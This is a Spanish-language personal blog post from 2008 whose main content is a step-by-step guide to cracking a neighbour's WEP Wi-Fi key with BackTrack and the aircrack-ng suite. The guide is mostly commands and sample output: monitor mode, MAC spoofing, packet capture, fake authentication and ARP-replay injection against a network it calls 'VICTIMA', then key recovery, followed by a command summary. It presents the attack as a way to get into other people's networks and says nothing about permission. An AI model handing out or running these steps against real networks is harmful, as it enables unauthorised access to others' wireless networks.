domingo, 21 de diciembre de 2008

Li-yuan Rito

HOLA AMIGOS, ACA SALUDANDO A TODOS; ESPERANDO ESTEN BIEN.

MUY CONTENTO ME DECIDO APOSTEAR MI BLOG,,, ESPERO LES AGRADE EL AMBIENTE
Y PUEDAN OBTENER ALGUNAS COSAS QUE DEJARE AL ALCANCE.
SIN MAS POR EL MOMENTO LES DEJO EL BLOG......


ATTE: LI-YUAN (GEAR_BOY).

Gears of War 2

Gears of War 2
Sin duda la Mente Maestra de los juegos 360

hacking con back track


Abrimos una consola e ingresamos

Código:

iwconfig

Con este comando podremos saber cuál es nuestra interfaz wifi, en mi caso es ath0 como pueden ver en la imagen pero puede ser distinta para ustedes solo es cosa de que la ubiquen, después procederemos a detenerla con el comando

Código:

airmon-ng stop ath0

Después apagamos wifi0 de la siguiente manera

Código:

ifconfig wifi0 down

Para facilitarnos el trabajo de estar memorizando la Mac Adress o simplemente por seguridad la cambiaremos con el siguiente comando

Código:

macchanger -m 00:11:22:33:44:55 wifi0


Ahora pasamos a lo interesante poniendo nuestra tarjeta de red en modo monitor con el comando

Código:

airmon-ng start wifi0

De estar todo correcto nuestra tarjeta estará en modo de monitor que es como nos permitirá capturar paquetes.
Después de esto veremos las redes que tenemos disponibles, ingresaremos lo siguiente

Código:

airodump-ng -w redes ath0

Con esto le estamos diciendo al airodump que deberá de escribir (-w Write) un archivo llamado redes todo lo que capture con la interfaz ath0; con este comando escaneara los 11 canales en busca de redes inalámbricas pero si deseamos restringirlo a un solo canal podemos usar el siguiente comando

Código:

airodump-ng -w redes --channel 4 ath0


Con esto le indicamos que solo va a escanear el canal 4, recuerden que esto es un ejemplo ustedes deben de poner el canal que deseen, al momento de inyectar paquetes es muy útil restringir la captura al canal de nuestra victima para as? no desperdiciar tiempo en los otros 10 canales.

Hay otra opción para indicarle que utilice la extensión IVS en vez de CAP que es la que usa por defecto para el archivo de captura, muchos dicen que con este tipo de archivo es mas rápido el crackeo solo hay que agregar --ivs y quedará de la siguiente manera

Código:

airodump-ng --ivs -w redes --channel 4 ath0

Una vez que hemos ingresado nuestro comando correctamente nos aparecer? una pantalla como esta
Aquí esta escaneando todos los canales pero como del que deseo extraer la contraseña esta en el canal 4 yo utilizare el comando anterior, aquí pueden ver que solo estoy escaneando el canal 4, dejamos esta consola así tal como está y abrimos una nueva para ingresar el siguiente comando

Código:

aireplay-ng -1 0 -e VICTIMA -a 00:4E:3F:49:F3:49 -h 00:11:22:33:44:55 ath0

Aquí lo que deberán modificar es VICTIMA es el SSID o nombre de la red de la que desean conseguir la clave WEP, después la Mac adress de la víctima y por último la nuestra. En dado caso que el SSID tenga mas de una palabra ingresaremos el comando de la siguiente manera:

Código:

aireplay-ng -1 0 -e red\de\internet -a 00:4E:3F:49:F3:49 -h 00:11:22:33:44:55 ath0

Note como se utilizan diagonales en vez de espacios
Si hacemos todo correctamente nos aparecerá un mensaje como este

Código:

03:35:14 Waiting for beacon frame (BSSID: 00:14:95
http://www.mexhackteam.org/foro/images/smilies/biggrin.gifC:0B:71) on channel 4
03:35:14 Sending Authentication Request (Open System) [ACK]
03:35:14 Authentication successful
03:35:14 Sending Association Request [ACK]
03:35:14 Association successful :-)


Si todo va bien hasta aquí comenzaremos con la inyección de paquetes con el comando

Código:

aireplay-ng -3 -b 00:4E:3F:49:F3:49 -h 00:11:22:33:44:55 ath0


Podremos ver en nuestra consola anterior el progreso de la captura de paquetes en la sección #Data que es la que nos interesa que junte mas de 5000 paquetes para conseguir la clave, el proceso puede variar mucho dependiendo de la calidad de la señal y la distancia de nuestra victima así como otros factores mas, pero debemos de ser pacientes en algunos casos mientras que en otros será todo muy rápido.

Después de haber juntado suficientes paquetes abrimos una nueva consola e ingresamos el siguiente comando

Código:

aircrack-ng redes-01.ivs

Así es el comando por defecto pero si nuestra victima es un 2wire podremos agregarle -n 64 indicándole que la clave es de 40 bits y asi acelerar el proceso

Código:

aircrack-ng -n 64 redes-01.ivs

Y si creemos que pudieran ser únicamente números solo agregaremos -t al comando

Código:

aircrack-ng -n 64 –t redes-01.ivs

Si ustedes utilizaron la extensión por defecto solo deben de cambiar ivs por cap y listo a esperar a que encuentre la llave, en algunas ocasiones nos pedirá que capturemos primero mas paquetes pero si corremos con suerte y hemos capturado los suficientes tendremos la clave en unos instantes.

http://img509.imageshack.us/img509/8181/15360964ep6.jpg

Key Found. [11:26:15:18:26]

Esta es nuestra clave, sin los puntos claro.
Pues hasta aquí llega esta guía, espero que sea de utilidad a cada uno de ustedes, solo les pido que si la publican en otras páginas respeten la auditoria así como los agradecimientos.

Resumen de comandos
Código:

iwconfig
airmon-ng stop ath0
ifconfig wifi0 down
macchanger -m 00:11:22:33:44:55 ath0
airmon-ng start wifi0
airodump-ng -w redes ath0
aireplay-ng -1 0 -e VICTIMA -a 00:4E:3F:49:F3:49 -h 00:11:22:33:44:55 ath0
aireplay-ng -3 -b 00:4E:3F:49:F3:49 -h 00:11:22:33:44:55 ath0
aircrack-ng redes-01.cap


Agradezco a Sanatas y kyokorn pues gracias a sus tutoriales aprendí esta técnica.